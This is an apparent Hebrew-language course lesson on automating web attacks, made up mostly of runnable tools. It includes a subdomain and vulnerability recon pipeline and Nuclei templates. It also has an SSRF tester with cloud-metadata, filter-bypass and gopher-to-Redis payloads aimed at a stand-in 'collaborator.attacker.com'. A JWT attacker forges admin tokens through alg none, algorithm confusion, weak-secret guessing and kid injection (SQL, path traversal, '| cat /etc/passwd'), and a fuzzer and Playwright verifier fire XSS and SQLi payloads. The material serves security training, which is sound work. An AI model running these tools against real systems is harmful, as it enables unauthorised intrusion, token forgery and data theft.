לדלג לתוכן

אוטומציה של תקיפות - Attack Automation

מבוא

אוטומציה היא המפתח ליעילות במחקר אבטחה. חוקר שיודע לאטמט את תהליכי הסריקה, הזיהוי והניצול יכול לכסות שטח תקיפה גדול בהרבה מחוקר שעובד ידנית. בשיעור זה נבנה כלים אוטומטיים מקצועיים.


בניית צינור סריקה - Recon Pipeline

הרעיון

צינור סריקה מחבר מספר כלים בשרשרת אוטומטית:

Subdomain Enumeration → Alive Check → Port Scanning →
Technology Detection → Content Discovery → Vulnerability Scanning

סקריפט צינור סריקה מלא

#!/bin/bash
# recon.sh - צינור סריקה אוטומטי
# שימוש: ./recon.sh target.com

TARGET=$1
OUTDIR="./recon/$TARGET/$(date +%Y%m%d)"
mkdir -p "$OUTDIR"

echo "[*] מתחיל סריקה של $TARGET"
echo "[*] תוצאות נשמרות ב: $OUTDIR"

# ============================
# שלב 1: סריקת תת-דומיינים
# ============================
echo "[1/6] סריקת תת-דומיינים..."

# subfinder
subfinder -d "$TARGET" -silent -o "$OUTDIR/subfinder.txt" 2>/dev/null

# amass (מצב פסיבי)
amass enum -passive -d "$TARGET" -o "$OUTDIR/amass.txt" 2>/dev/null

# assetfinder
assetfinder --subs-only "$TARGET" > "$OUTDIR/assetfinder.txt" 2>/dev/null

# חיפוש ב-crt.sh
curl -s "https://crt.sh/?q=%25.$TARGET&output=json" | \
  jq -r '.[].name_value' | sort -u > "$OUTDIR/crtsh.txt" 2>/dev/null

# איחוד כל התוצאות
cat "$OUTDIR"/subfinder.txt "$OUTDIR"/amass.txt \
    "$OUTDIR"/assetfinder.txt "$OUTDIR"/crtsh.txt 2>/dev/null | \
  sort -u > "$OUTDIR/all_subdomains.txt"

TOTAL_SUBS=$(wc -l < "$OUTDIR/all_subdomains.txt")
echo "    נמצאו $TOTAL_SUBS תת-דומיינים ייחודיים"

# ============================
# שלב 2: בדיקת זמינות
# ============================
echo "[2/6] בדיקת זמינות..."

httpx -l "$OUTDIR/all_subdomains.txt" -silent \
  -status-code -title -tech-detect \
  -o "$OUTDIR/alive.txt" 2>/dev/null

ALIVE=$(wc -l < "$OUTDIR/alive.txt")
echo "    $ALIVE תת-דומיינים חיים"

# חילוץ URLs בלבד
cat "$OUTDIR/alive.txt" | awk '{print $1}' > "$OUTDIR/alive_urls.txt"

# ============================
# שלב 3: סריקת פורטים
# ============================
echo "[3/6] סריקת פורטים..."

# סריקה מהירה של פורטים נפוצים
cat "$OUTDIR/all_subdomains.txt" | \
  naabu -p 80,443,8080,8443,8000,8888,3000,5000,9090,9200 \
  -silent -o "$OUTDIR/ports.txt" 2>/dev/null

echo "    סריקת פורטים הושלמה"

# ============================
# שלב 4: זיהוי טכנולוגיות
# ============================
echo "[4/6] זיהוי טכנולוגיות..."

# שימוש ב-httpx עם זיהוי טכנולוגיות
httpx -l "$OUTDIR/alive_urls.txt" -silent \
  -tech-detect -json -o "$OUTDIR/tech.json" 2>/dev/null

echo "    זיהוי טכנולוגיות הושלם"

# ============================
# שלב 5: גילוי תוכן
# ============================
echo "[5/6] גילוי תוכן..."

while IFS= read -r url; do
  domain=$(echo "$url" | sed 's|https\?://||' | sed 's|/.*||')
  mkdir -p "$OUTDIR/content/$domain"

  # גילוי נתיבים
  ffuf -u "${url}/FUZZ" \
    -w /usr/share/wordlists/dirb/common.txt \
    -mc 200,301,302,403 \
    -o "$OUTDIR/content/$domain/dirs.json" \
    -of json -s 2>/dev/null

  # גילוי קבצי JavaScript
  echo "$url" | gau --subs 2>/dev/null | \
    grep -iE '\.js$' | sort -u > "$OUTDIR/content/$domain/js_files.txt"

done < "$OUTDIR/alive_urls.txt"

echo "    גילוי תוכן הושלם"

# ============================
# שלב 6: סריקת חולשות
# ============================
echo "[6/6] סריקת חולשות..."

nuclei -l "$OUTDIR/alive_urls.txt" \
  -severity critical,high,medium \
  -o "$OUTDIR/nuclei_results.txt" \
  -silent 2>/dev/null

echo "    סריקת חולשות הושלמה"

# ============================
# דוח סיכום
# ============================
echo ""
echo "================================"
echo "   דוח סיכום - $TARGET"
echo "================================"
echo "תת-דומיינים: $TOTAL_SUBS"
echo "חיים: $ALIVE"
echo "פורטים פתוחים: $(wc -l < "$OUTDIR/ports.txt" 2>/dev/null || echo 0)"
echo "ממצאי Nuclei: $(wc -l < "$OUTDIR/nuclei_results.txt" 2>/dev/null || echo 0)"
echo "תוצאות: $OUTDIR"

כתיבת תבניות Nuclei

מבנה תבנית בסיסי

id: custom-admin-panel-detect

info:
  name: Admin Panel Detection
  author: researcher
  severity: info
  description: זיהוי פאנלי ניהול חשופים
  tags: admin,panel,detection

requests:
  - method: GET
    path:
      - "{{BaseURL}}/admin"
      - "{{BaseURL}}/admin/login"
      - "{{BaseURL}}/administrator"
      - "{{BaseURL}}/wp-admin"
      - "{{BaseURL}}/cp"
      - "{{BaseURL}}/dashboard"

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "admin"
          - "login"
          - "dashboard"
        condition: and
        part: body

      - type: status
        status:
          - 200
          - 302

תבנית לזיהוי SSRF

id: ssrf-detection

info:
  name: SSRF Detection via OOB
  author: researcher
  severity: high
  description: זיהוי SSRF דרך callback חיצוני
  tags: ssrf,oob

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/fetch"
      - "{{BaseURL}}/api/proxy"
      - "{{BaseURL}}/api/url-preview"
      - "{{BaseURL}}/api/webhook"

    headers:
      Content-Type: application/json

    body: |
      {"url": "http://{{interactsh-url}}"}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"

  - method: GET
    path:
      - "{{BaseURL}}/redirect?url=http://{{interactsh-url}}"
      - "{{BaseURL}}/fetch?url=http://{{interactsh-url}}"
      - "{{BaseURL}}/proxy?url=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"

תבנית לזיהוי JWT חלש

id: jwt-weak-secret

info:
  name: JWT Weak Secret Detection
  author: researcher
  severity: high
  description: זיהוי JWT עם סודות חלשים
  tags: jwt,authentication

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/me"
      - "{{BaseURL}}/api/user"
      - "{{BaseURL}}/api/profile"

    headers:
      Authorization: "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "user"
          - "email"
          - "name"
        condition: or
        part: body

    extractors:
      - type: json
        json:
          - '.email'
          - '.name'
          - '.role'

תבנית Workflow - בדיקה מרובת שלבים

id: oauth-misconfiguration-workflow

info:
  name: OAuth Misconfiguration Chain
  author: researcher
  severity: high
  description: בדיקה מרובת שלבים של הגדרות OAuth
  tags: oauth,workflow

workflows:
  - template: detect-oauth-endpoint.yaml
    subtemplates:
      - template: check-redirect-uri-validation.yaml
        subtemplates:
          - template: steal-oauth-token.yaml

הרחבות Burp Suite בפייתון

הרחבת סורק פסיבי - Montoya API

# passive_scanner.py - הרחבה שמזהה מידע רגיש בתגובות
from burp.api.montoya import MontoyaApi
from burp.api.montoya.scanner import (
    AuditResult, AuditIssue, ScanCheck, ConsolidationAction
)
import re

class SensitiveDataScanner(ScanCheck):
    PATTERNS = {
        'AWS Access Key': r'AKIA[0-9A-Z]{16}',
        'AWS Secret Key': r'[0-9a-zA-Z/+]{40}',
        'GitHub Token': r'gh[ps]_[A-Za-z0-9_]{36}',
        'Slack Token': r'xox[baprs]-[0-9a-zA-Z-]+',
        'JWT Token': r'eyJ[A-Za-z0-9-_]+\.eyJ[A-Za-z0-9-_]+\.[A-Za-z0-9-_.+/=]*',
        'Private Key': r'-----BEGIN (RSA |EC )?PRIVATE KEY-----',
        'API Key Pattern': r'(?i)(api[_-]?key|apikey|api_secret)["\s:=]+["\']?[\w-]{20,}',
        'Internal IP': r'\b(?:10|172\.(?:1[6-9]|2\d|3[01])|192\.168)\.\d{1,3}\.\d{1,3}\b',
        'Email Address': r'[\w.-]+@[\w.-]+\.\w+',
    }

    def __init__(self, api: MontoyaApi):
        self.api = api

    def activeAudit(self, baseRequestResponse):
        return AuditResult.auditResult([])

    def passiveAudit(self, baseRequestResponse):
        issues = []
        response = baseRequestResponse.response()

        if response is None:
            return AuditResult.auditResult([])

        body = response.bodyToString()

        for name, pattern in self.PATTERNS.items():
            matches = re.findall(pattern, body)
            if matches:
                issue = AuditIssue.auditIssue(
                    f"Sensitive Data Exposure: {name}",
                    f"Found {len(matches)} instance(s) of {name} in response body. "
                    f"Sample: {matches[0][:50]}...",
                    None,
                    baseRequestResponse.request().url(),
                    AuditIssueSeverity.MEDIUM,
                    AuditIssueConfidence.CERTAIN,
                    None,
                    None,
                    AuditIssueSeverity.MEDIUM,
                    baseRequestResponse
                )
                issues.append(issue)

        return AuditResult.auditResult(issues)

    def consolidateIssues(self, newIssue, existingIssue):
        if newIssue.name() == existingIssue.name():
            return ConsolidationAction.KEEP_EXISTING
        return ConsolidationAction.KEEP_BOTH

# נקודת כניסה
def initialize(api: MontoyaApi):
    api.scanner().registerScanCheck(SensitiveDataScanner(api))
    api.logging().logToOutput("Sensitive Data Scanner loaded!")

סקריפטי אוטומציה בפייתון

סקריפט בדיקת SSRF אוטומטי

#!/usr/bin/env python3
"""
ssrf_tester.py - בדיקת SSRF אוטומטית
"""
import requests
import urllib.parse
import time
import sys
from concurrent.futures import ThreadPoolExecutor

class SSRFTester:
    def __init__(self, callback_server):
        self.callback = callback_server
        self.session = requests.Session()
        self.results = []

        # פיילודים ל-SSRF
        self.payloads = [
            # ישיר
            f"http://{callback_server}/ssrf",
            # כתובת metadata
            "http://169.254.169.254/latest/meta-data/",
            "http://metadata.google.internal/computeMetadata/v1/",
            # עקיפת סינון
            "http://0x7f000001/",
            "http://2130706433/",
            "http://017700000001/",
            "http://[::1]/",
            f"http://0177.0.0.1/",
            # DNS rebinding
            f"http://127.0.0.1.nip.io/",
            # עם redirect
            f"http://{callback_server}/redirect?to=http://169.254.169.254/",
            # Gopher protocol
            "gopher://127.0.0.1:6379/_INFO",
        ]

        # פרמטרים נפוצים שעלולים להיות פגיעים
        self.params = [
            'url', 'uri', 'path', 'dest', 'redirect', 'redirect_uri',
            'callback', 'return', 'page', 'feed', 'host', 'site',
            'html', 'data', 'reference', 'ref', 'fetch', 'proxy',
            'link', 'src', 'source', 'target', 'domain', 'load',
        ]

    def test_endpoint(self, base_url, param, payload):
        """בדיקת נקודת קצה ספציפית"""
        try:
            # GET
            url = f"{base_url}?{param}={urllib.parse.quote(payload)}"
            response = self.session.get(url, timeout=10, allow_redirects=False)

            result = {
                'url': base_url,
                'param': param,
                'payload': payload,
                'method': 'GET',
                'status': response.status_code,
                'length': len(response.text),
            }

            # בדיקת סימנים ל-SSRF
            if self.check_indicators(response):
                result['vulnerable'] = True
                self.results.append(result)
                print(f"[!] SSRF פוטנציאלי: {url}")
                return result

            # POST JSON
            response = self.session.post(
                base_url,
                json={param: payload},
                timeout=10,
                allow_redirects=False
            )

            result['method'] = 'POST'
            result['status'] = response.status_code

            if self.check_indicators(response):
                result['vulnerable'] = True
                self.results.append(result)
                print(f"[!] SSRF פוטנציאלי (POST): {base_url}")

            return result

        except requests.exceptions.Timeout:
            # Timeout יכול להיות סימן ל-SSRF blind
            return {'url': base_url, 'param': param, 'timeout': True}
        except Exception as e:
            return None

    def check_indicators(self, response):
        """בדיקת סימנים שמעידים על SSRF"""
        indicators = [
            'ami-id', 'instance-id',  # AWS metadata
            'computeMetadata',  # GCP metadata
            'metadata/instance',  # Azure metadata
            'REDIS', '+OK', '+PONG',  # Redis
            'root:x:0:0',  # /etc/passwd
        ]
        for indicator in indicators:
            if indicator in response.text:
                return True
        return False

    def scan(self, endpoints):
        """סריקת רשימת נקודות קצה"""
        tasks = []
        for endpoint in endpoints:
            for param in self.params:
                for payload in self.payloads:
                    tasks.append((endpoint, param, payload))

        with ThreadPoolExecutor(max_workers=10) as executor:
            futures = [
                executor.submit(self.test_endpoint, *task)
                for task in tasks
            ]

        print(f"\n[+] סריקה הושלמה. נמצאו {len(self.results)} ממצאים")
        return self.results


if __name__ == '__main__':
    tester = SSRFTester("collaborator.attacker.com")
    endpoints = [
        "https://target.com/api/fetch",
        "https://target.com/api/proxy",
        "https://target.com/api/preview",
    ]
    results = tester.scan(endpoints)

סקריפט תקיפת JWT אוטומטי

#!/usr/bin/env python3
"""
jwt_attacker.py - בדיקות אוטומטיות על JWT
"""
import jwt
import json
import base64
import requests
import hmac
import hashlib
from datetime import datetime, timedelta

class JWTAttacker:
    def __init__(self, target_url, token):
        self.target_url = target_url
        self.original_token = token
        self.header, self.payload, self.signature = self.decode_token(token)

    def decode_token(self, token):
        """פענוח JWT ללא אימות חתימה"""
        parts = token.split('.')
        header = json.loads(self.b64_decode(parts[0]))
        payload = json.loads(self.b64_decode(parts[1]))
        signature = parts[2]
        return header, payload, signature

    def b64_decode(self, data):
        """פענוח Base64URL"""
        padding = 4 - len(data) % 4
        data += '=' * padding
        return base64.urlsafe_b64decode(data)

    def b64_encode(self, data):
        """קידוד Base64URL"""
        return base64.urlsafe_b64encode(data).rstrip(b'=').decode()

    def test_none_algorithm(self):
        """בדיקה 1: Algorithm None"""
        print("[*] בדיקת Algorithm None...")
        for alg in ['none', 'None', 'NONE', 'nOnE']:
            header = {'alg': alg, 'typ': 'JWT'}
            payload = self.payload.copy()
            payload['role'] = 'admin'

            token = (
                self.b64_encode(json.dumps(header).encode()) + '.' +
                self.b64_encode(json.dumps(payload).encode()) + '.'
            )

            if self.test_token(token):
                print(f"[+] Algorithm None עובד! alg={alg}")
                return token
        print("[-] Algorithm None לא עובד")
        return None

    def test_algorithm_confusion(self, public_key_pem):
        """בדיקה 2: Algorithm Confusion (RS256 -> HS256)"""
        print("[*] בדיקת Algorithm Confusion...")

        header = {'alg': 'HS256', 'typ': 'JWT'}
        payload = self.payload.copy()
        payload['role'] = 'admin'

        header_b64 = self.b64_encode(json.dumps(header).encode())
        payload_b64 = self.b64_encode(json.dumps(payload).encode())
        signing_input = f"{header_b64}.{payload_b64}"

        # חתימה עם המפתח הציבורי כסוד ל-HMAC
        signature = hmac.new(
            public_key_pem.encode(),
            signing_input.encode(),
            hashlib.sha256
        ).digest()

        token = f"{signing_input}.{self.b64_encode(signature)}"

        if self.test_token(token):
            print("[+] Algorithm Confusion עובד!")
            return token
        print("[-] Algorithm Confusion לא עובד")
        return None

    def test_weak_secrets(self):
        """בדיקה 3: סודות חלשים"""
        print("[*] בדיקת סודות חלשים...")

        secrets = [
            'secret', 'password', '123456', 'key', 'jwt_secret',
            'your-256-bit-secret', 'changeme', 'admin', 'test',
            'supersecret', 'jwt', 'token', 'mysecret', 'default',
            '', 'null', 'undefined', 'SECRET_KEY',
        ]

        # קריאה מקובץ אם קיים
        try:
            with open('jwt_secrets.txt') as f:
                secrets.extend(f.read().splitlines())
        except FileNotFoundError:
            pass

        for secret in secrets:
            try:
                payload = self.payload.copy()
                payload['role'] = 'admin'
                payload['exp'] = int((
                    datetime.utcnow() + timedelta(days=30)
                ).timestamp())

                token = jwt.encode(payload, secret, algorithm='HS256')

                if self.test_token(token):
                    print(f"[+] סוד נמצא: '{secret}'")
                    return secret, token
            except Exception:
                continue

        print("[-] סוד חלש לא נמצא")
        return None, None

    def test_kid_injection(self):
        """בדיקה 4: KID Header Injection"""
        print("[*] בדיקת KID Injection...")

        injections = [
            # SQL Injection ב-kid
            ("' UNION SELECT 'secret' -- ", 'secret'),
            # Path Traversal ב-kid
            ("../../dev/null", ''),
            ("../../../dev/null", ''),
            # Command Injection
            ("| cat /etc/passwd", ''),
        ]

        for kid, secret in injections:
            header = {
                'alg': 'HS256',
                'typ': 'JWT',
                'kid': kid
            }
            payload = self.payload.copy()
            payload['role'] = 'admin'

            try:
                token = jwt.encode(
                    payload, secret,
                    algorithm='HS256',
                    headers=header
                )
                if self.test_token(token):
                    print(f"[+] KID Injection עובד! kid='{kid}'")
                    return token
            except Exception:
                continue

        print("[-] KID Injection לא עובד")
        return None

    def test_claim_tampering(self):
        """בדיקה 5: שינוי claims"""
        print("[*] בדיקת שינוי Claims...")

        modifications = [
            {'role': 'admin'},
            {'admin': True},
            {'is_admin': True},
            {'user_type': 'admin'},
            {'sub': '1'},  # ID של אדמין
            {'group': 'administrators'},
        ]

        for mod in modifications:
            payload = self.payload.copy()
            payload.update(mod)

            # ניסיון ללא שינוי החתימה (בדיקה אם החתימה נבדקת)
            header_b64 = self.b64_encode(json.dumps(self.header).encode())
            payload_b64 = self.b64_encode(json.dumps(payload).encode())
            token = f"{header_b64}.{payload_b64}.{self.signature}"

            if self.test_token(token):
                print(f"[+] שינוי Claims עובד! {mod}")
                return token

        print("[-] שינוי Claims לא עובד")
        return None

    def test_token(self, token):
        """בדיקת טוקן מול השרת"""
        try:
            response = requests.get(
                self.target_url,
                headers={'Authorization': f'Bearer {token}'},
                timeout=5
            )
            if response.status_code == 200:
                data = response.json()
                if data.get('role') == 'admin' or data.get('is_admin'):
                    return True
        except Exception:
            pass
        return False

    def run_all_tests(self, public_key=None):
        """הרצת כל הבדיקות"""
        print(f"[*] מתחיל בדיקת JWT")
        print(f"[*] כותרת: {json.dumps(self.header)}")
        print(f"[*] מטען: {json.dumps(self.payload)}")
        print()

        # בדיקה 1
        result = self.test_none_algorithm()
        if result:
            return result

        # בדיקה 2
        if public_key:
            result = self.test_algorithm_confusion(public_key)
            if result:
                return result

        # בדיקה 3
        secret, result = self.test_weak_secrets()
        if result:
            return result

        # בדיקה 4
        result = self.test_kid_injection()
        if result:
            return result

        # בדיקה 5
        result = self.test_claim_tampering()
        if result:
            return result

        print("\n[-] לא נמצאו חולשות JWT")
        return None


if __name__ == '__main__':
    attacker = JWTAttacker(
        target_url='https://target.com/api/me',
        token='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...'
    )
    attacker.run_all_tests()

סקריפט Fuzzing פרמטרים עם aiohttp

#!/usr/bin/env python3
"""
param_fuzzer.py - סקריפט Fuzzing אסינכרוני
"""
import aiohttp
import asyncio
import sys
from urllib.parse import urlencode
import json

class ParamFuzzer:
    def __init__(self, target_url, wordlist_path, concurrency=50):
        self.target_url = target_url
        self.concurrency = concurrency
        self.results = []
        self.semaphore = asyncio.Semaphore(concurrency)

        with open(wordlist_path) as f:
            self.params = f.read().splitlines()

    async def fuzz_param(self, session, param, value):
        """בדיקת פרמטר בודד"""
        async with self.semaphore:
            try:
                # GET
                url = f"{self.target_url}?{param}={value}"
                async with session.get(url, timeout=aiohttp.ClientTimeout(total=10)) as response:
                    body = await response.text()
                    result = {
                        'param': param,
                        'value': value,
                        'status': response.status,
                        'length': len(body),
                        'reflected': value in body,
                    }

                    if result['reflected']:
                        print(f"[+] ערך משתקף: {param}={value} "
                              f"(status={response.status}, len={len(body)})")

                    self.results.append(result)
                    return result

            except asyncio.TimeoutError:
                return {'param': param, 'timeout': True}
            except Exception as e:
                return {'param': param, 'error': str(e)}

    async def discover_params(self, session):
        """גילוי פרמטרים נסתרים"""
        print(f"[*] בודק {len(self.params)} פרמטרים...")
        baseline_response = None

        async with session.get(self.target_url) as response:
            baseline_response = {
                'status': response.status,
                'length': len(await response.text())
            }

        tasks = []
        for param in self.params:
            task = self.fuzz_param(session, param, 'fuzzing123')
            tasks.append(task)

        results = await asyncio.gather(*tasks)

        # סינון פרמטרים שגרמו לשינוי בתגובה
        interesting = []
        for result in results:
            if result and not result.get('error') and not result.get('timeout'):
                if (result['status'] != baseline_response['status'] or
                    abs(result['length'] - baseline_response['length']) > 50):
                    interesting.append(result)

        return interesting

    async def test_xss(self, session, params):
        """בדיקת XSS על פרמטרים שמשתקפים"""
        print(f"\n[*] בדיקת XSS על {len(params)} פרמטרים...")

        xss_payloads = [
            '<script>alert(1)</script>',
            '"><img src=x onerror=alert(1)>',
            "'-alert(1)-'",
            '{{7*7}}',
            '${7*7}',
        ]

        for param_result in params:
            if param_result.get('reflected'):
                for payload in xss_payloads:
                    result = await self.fuzz_param(
                        session, param_result['param'], payload
                    )
                    if result and result.get('reflected'):
                        print(f"[!] XSS פוטנציאלי: "
                              f"{param_result['param']}={payload}")

    async def test_sqli(self, session, params):
        """בדיקת SQLi על פרמטרים"""
        print(f"\n[*] בדיקת SQLi על {len(params)} פרמטרים...")

        sqli_payloads = [
            "' OR 1=1--",
            "1' AND '1'='1",
            "1 AND 1=1",
            "' UNION SELECT NULL--",
            "1; WAITFOR DELAY '0:0:5'--",
        ]

        for param_result in params:
            for payload in sqli_payloads:
                result = await self.fuzz_param(
                    session, param_result['param'], payload
                )
                if result and result.get('status') == 500:
                    print(f"[!] SQLi פוטנציאלי: "
                          f"{param_result['param']}={payload}")

    async def run(self):
        """הרצת כל הבדיקות"""
        async with aiohttp.ClientSession() as session:
            # גילוי פרמטרים
            interesting = await self.discover_params(session)
            print(f"\n[+] נמצאו {len(interesting)} פרמטרים מעניינים")

            reflected = [r for r in interesting if r.get('reflected')]
            print(f"[+] {len(reflected)} פרמטרים משתקפים")

            # בדיקת XSS
            await self.test_xss(session, reflected)

            # בדיקת SQLi
            await self.test_sqli(session, interesting)


if __name__ == '__main__':
    fuzzer = ParamFuzzer(
        target_url='https://target.com/page',
        wordlist_path='params.txt',
        concurrency=30
    )
    asyncio.run(fuzzer.run())

אוטומציה עם דפדפן Headless

בדיקת XSS אוטומטית עם Playwright

#!/usr/bin/env python3
"""
xss_verifier.py - אימות XSS אוטומטי עם Playwright
"""
import asyncio
from playwright.async_api import async_playwright
import json

class XSSVerifier:
    def __init__(self):
        self.confirmed = []
        self.payloads = [
            '<img src=x onerror=window.__xss_triggered=true>',
            '<svg onload=window.__xss_triggered=true>',
            '"><img src=x onerror=window.__xss_triggered=true>',
            "'-window.__xss_triggered=true-'",
            '<details open ontoggle=window.__xss_triggered=true>',
        ]

    async def verify_xss(self, url, param, payload):
        """אימות XSS בודד"""
        async with async_playwright() as p:
            browser = await p.chromium.launch(headless=True)
            context = await browser.new_context()
            page = await context.new_page()

            # הגדרת flag לזיהוי XSS
            await page.evaluate('window.__xss_triggered = false')

            # מעקב אחרי dialog (alert/confirm/prompt)
            dialog_triggered = False
            async def handle_dialog(dialog):
                nonlocal dialog_triggered
                dialog_triggered = True
                await dialog.dismiss()

            page.on('dialog', handle_dialog)

            try:
                test_url = f"{url}?{param}={payload}"
                await page.goto(test_url, wait_until='networkidle', timeout=10000)

                # בדיקה אם ה-XSS הופעל
                xss_flag = await page.evaluate('window.__xss_triggered')

                if xss_flag or dialog_triggered:
                    # צילום מסך כהוכחה
                    screenshot_path = f"xss_proof_{param}_{len(self.confirmed)}.png"
                    await page.screenshot(path=screenshot_path)

                    result = {
                        'url': test_url,
                        'param': param,
                        'payload': payload,
                        'screenshot': screenshot_path,
                        'dialog': dialog_triggered,
                        'flag': xss_flag,
                    }
                    self.confirmed.append(result)
                    print(f"[+] XSS מאושר! {param}={payload}")
                    print(f"    צילום מסך: {screenshot_path}")
                    return result

            except Exception as e:
                pass
            finally:
                await browser.close()

        return None

    async def scan(self, target_url, params):
        """סריקת כל הפרמטרים"""
        print(f"[*] בדיקת {len(params)} פרמטרים עם {len(self.payloads)} payloads")

        for param in params:
            for payload in self.payloads:
                await self.verify_xss(target_url, param, payload)

        print(f"\n[+] סיום. {len(self.confirmed)} XSS מאושרים")
        return self.confirmed

    async def capture_dom_xss(self, url):
        """זיהוי DOM XSS"""
        async with async_playwright() as p:
            browser = await p.chromium.launch(headless=True)
            page = await browser.new_page()

            # מעקב אחרי sinks מסוכנים
            await page.add_init_script("""
                const originalInnerHTML = Object.getOwnPropertyDescriptor(
                    Element.prototype, 'innerHTML'
                );
                Object.defineProperty(Element.prototype, 'innerHTML', {
                    set: function(value) {
                        if (value.includes('<script') || value.includes('onerror')) {
                            window.__dom_xss_sinks = window.__dom_xss_sinks || [];
                            window.__dom_xss_sinks.push({
                                sink: 'innerHTML',
                                element: this.tagName,
                                value: value.substring(0, 200)
                            });
                        }
                        return originalInnerHTML.set.call(this, value);
                    },
                    get: function() {
                        return originalInnerHTML.get.call(this);
                    }
                });
            """)

            await page.goto(url, wait_until='networkidle', timeout=15000)

            sinks = await page.evaluate('window.__dom_xss_sinks || []')
            await browser.close()

            if sinks:
                print(f"[!] זוהו DOM XSS sinks:")
                for sink in sinks:
                    print(f"    {sink['sink']} על {sink['element']}: "
                          f"{sink['value'][:100]}")

            return sinks


if __name__ == '__main__':
    verifier = XSSVerifier()
    asyncio.run(verifier.scan(
        'https://target.com/search',
        ['q', 'query', 'search', 'keyword']
    ))

אינטגרציית אבטחה ב-CI/CD

GitHub Actions - סריקת אבטחה אוטומטית

# .github/workflows/security-scan.yml
name: Security Scan

on:
  schedule:
    - cron: '0 6 * * 1'  # כל יום שני בשש בבוקר
  workflow_dispatch:  # הרצה ידנית

jobs:
  recon:
    runs-on: ubuntu-latest
    steps:
      - name: Install tools
        run: |
          go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
          go install github.com/projectdiscovery/httpx/cmd/httpx@latest
          go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

      - name: Subdomain enumeration
        run: subfinder -d ${{ secrets.TARGET_DOMAIN }} -o subdomains.txt

      - name: Check alive hosts
        run: httpx -l subdomains.txt -silent -o alive.txt

      - name: Vulnerability scan
        run: |
          nuclei -l alive.txt -severity critical,high \
            -o findings.txt -silent

      - name: Notify on findings
        if: ${{ hashFiles('findings.txt') != '' }}
        run: |
          curl -X POST ${{ secrets.SLACK_WEBHOOK }} \
            -H 'Content-Type: application/json' \
            -d "{\"text\": \"Security findings detected: $(cat findings.txt | wc -l) issues\"}"

      - name: Upload results
        uses: actions/upload-artifact@v3
        with:
          name: security-results
          path: |
            subdomains.txt
            alive.txt
            findings.txt

סיכום

כלי / טכניקה          שימוש                    רמת מורכבות
=====================================================================
Bash recon pipeline   סריקה ראשונית מקיפה      בינונית
Nuclei templates      סריקת חולשות מותאמת       בינונית
Burp extensions       ניטור פסיבי אוטומטי       גבוהה
Python SSRF tester    בדיקת SSRF ממוקדת         בינונית
JWT attacker          בדיקות JWT שיטתיות        בינונית
Param fuzzer          גילוי פרמטרים וחולשות     בינונית
Playwright XSS        אימות XSS אוטומטי         גבוהה
CI/CD integration     סריקה מתוזמנת             בינונית

המפתח הוא לבנות כלים שמתאימים לצרכים שלכם ולשפר אותם לאורך זמן. כל חוקר צריך ארגז כלים אישי שמתפתח עם הניסיון.